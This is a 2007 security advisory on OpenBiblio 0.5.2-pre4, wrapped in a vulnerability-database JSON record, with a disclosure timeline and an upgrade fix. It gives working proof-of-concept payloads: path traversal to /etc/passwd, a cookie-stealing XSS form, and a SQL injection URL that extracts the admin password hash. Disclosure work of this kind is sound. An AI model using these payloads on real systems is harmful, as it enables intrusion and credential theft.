{"sourceHref": "https://packetstormsecurity.com/files/download/62153/openbiblio-multi.txt", "sourceData": "` - Security Advisory - \n \n \n \n- OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities - \n---------------------------------------------------- \n \n \nProduct: OpenBiblio \nVersion: Version 0.5.2 Prerelease 4 and prior is affected \nUrl: http://obiblio.sourceforge.net/ \nAffected by: Full path disclosure, local file include, phpinfo \ndisclosure, multiple Cross Site Scripting, SQL injection \n \n \n \n \nI. Introduction. \n \nOpenBiblio is an easy to use, automated library system written in PHP \ncontaining OPAC, circulation, \ncataloging, and staff administration functionality. \nOpenBiblio library administration offers an intuitive interface with \nbroad category tabs and sidebar. \n \n \n \nII. Description \n \n \nOpenBiblio suffers multiple bugs. \n \n \n \n \n1) Local File Include vulnerability: its posible to include any \narbitrary local file using shared/help.php file \n \n- Code - \nif (isset($_GET[\"page\"])) { \n$page = $_GET[\"page\"]; \n} else { \n$page = \"contents\"; \n} \ninclude(\"../locale/\".OBIB_LOCALE.\"/help/\".$page.\".php\"); \n \n- PoC - \nhttp://site/openbiblio/shared/help.php?page=../../../../../../etc/passwd%00 \n \n \n \n \n \n2) Local File Include (2) (only works with register_globals On and \nfor non php files magic_quotes_gpc must be Off) \n \n- Code - \n<?php include(\"../navbars/\".$tab.\".php\");?> \n \n- PoC - \nhttp://site/openbiblio/shared/header.php?tab=../../../etc/passwd%00 \n \n \n \n \n \n3) This link will show phpinfo \n \nhttp://site/openbiblio/phpinfo.php \n \nRemove it! \n \n \n \n4) Path Disclosure \n \nSome samples: \n \nhttp://site/openbiblio/shared/footer.php \nFatal error: Call to a member function on a non-object in \n/httpdocs/openbiblio/shared/footer.php on line 18 \n \nhttp://site/openbiblio/circ/mbr_fields.php \nFatal error: Call to a member function on a non-object in \n/httpdocs/openbiblio/circ/mbr_fields.php on line 14 \n \n \nhttp://site/openbiblio/admin/custom_marc_form_fields.php \nFatal error: Cannot instantiate non-existent class: dmquery in \n/httpdocs/openbiblio/admin/custom_marc_form_fields.php on line 14 \n \n \nPlease, turn display_errors to Off in php.ini \n \n \n \n6) Multiple Cross Site Scripting, an attacker can perform an XSS \nattack that allows him to access the targeted user cookies \n \n \nSome samples: \n \nhttp://site/openbiblio/admin/staff_del_confirm.php?UID=1&LAST=[XSS]&FIRST=[XSS] \n \nhttp://site/openbiblio/admin/theme_del_confirm.php?themeid=6&name=[XSS] \n \nIn /admin/theme_preview.php an attacker can inject an XSS in the var \nthemeName with method POST. \nhere is a poc: \n \n \n<form action=\" http://site/openbiblio/admin/theme_preview.php\" method=\"post\"> \n<input type=\"text\" name=\"themeName\" size=\"40\" value=\"<script>alert( \ndocument.cookie);</script>\"><br><br> \n<input type=\"submit\" value=\"doit\"> \n</form> \n \n \n \n \ntry with: <script>alert(document.cookie);</script> \n \n \n \n \n \n6) SQL injection (session with report rol is needed to exploit this bug) \n \n \nAny user with report rol can access any field of the database, \nincluding admin md5 hash. \n \n \nhttp://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balanceDueList&title=Balance+Due+Member+List&sql=%0A++++[SQL]%0A++ \n \nwith this an attacker can get the md5 admin password: \n \n \nhttp://site/openbiblio/reports/report_criteria.php?reset=Y&rptid=balanceDueList&title=Balance+Due+Member+List&sql=%0A++++select+username,pwd+from+staff%20where+userid=1%0A++ \n \nthen click \"run report\" and view the results, besides, you can choose \nbetween html and csv format ;) \n \n \nstaff.username staff.pwd \nadmin 21232f297a57a5a743894a0e4a801fc3 \n \n \n \nIII. Timeline \n \n20/08/2006 - Bugs discovered \n25/08/2006 - Vendor Contacted \n30/08/2006 - Release 0.5.2 (parcial patch) \n21/02/2007 - Release 0.6.0 (full patch) \n28/12/2007 - Advisory Disclosure \n \n \n \n \nIV. Solution \n \nUpgrade to 0.6.0 from http://obiblio.sourceforge.net/ \nGood work! :) \n \n \nV. Credits \n \nJuan Galiana <jgaliana gmail com> \n \n \nRegards \n`\n", "edition": 1, "references": [], "modified": "2007-12-29T00:00:00", "hash": "4ff50fb7230e54dcae0b00cf4533f89a25c3637106aa8cda8ee9d04e54756a97", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/62153/openbiblio-multi.txt.html", "description": "", "id": "PACKETSTORM:62153", "reporter": "Juan Galiana Lara", "lastseen": "2016-11-03T10:15:50", "published": "2007-12-29T00:00:00", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:15:50"}, "dependencies": {"references": [], "modified": "2016-11-03T10:15:50"}, "vulnersScore": -0.3}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "openbiblio-multi.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "f84c456c7585f2adaf8cb27bd17ba77a", "key": "href"}, {"hash": "10192b652cedf00c4b4267666e474dfb", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "10192b652cedf00c4b4267666e474dfb", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "17c494af63f689338f27288791da4979", "key": "reporter"}, {"hash": "9362ebc8bd326858524bd8d9bc6bc71c", "key": "sourceData"}, {"hash": "fe25e62902bc31a7332abd7f587ee485", "key": "sourceHref"}, {"hash": "56b4f13f6df373b3c440646b5d8fac37", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}

{}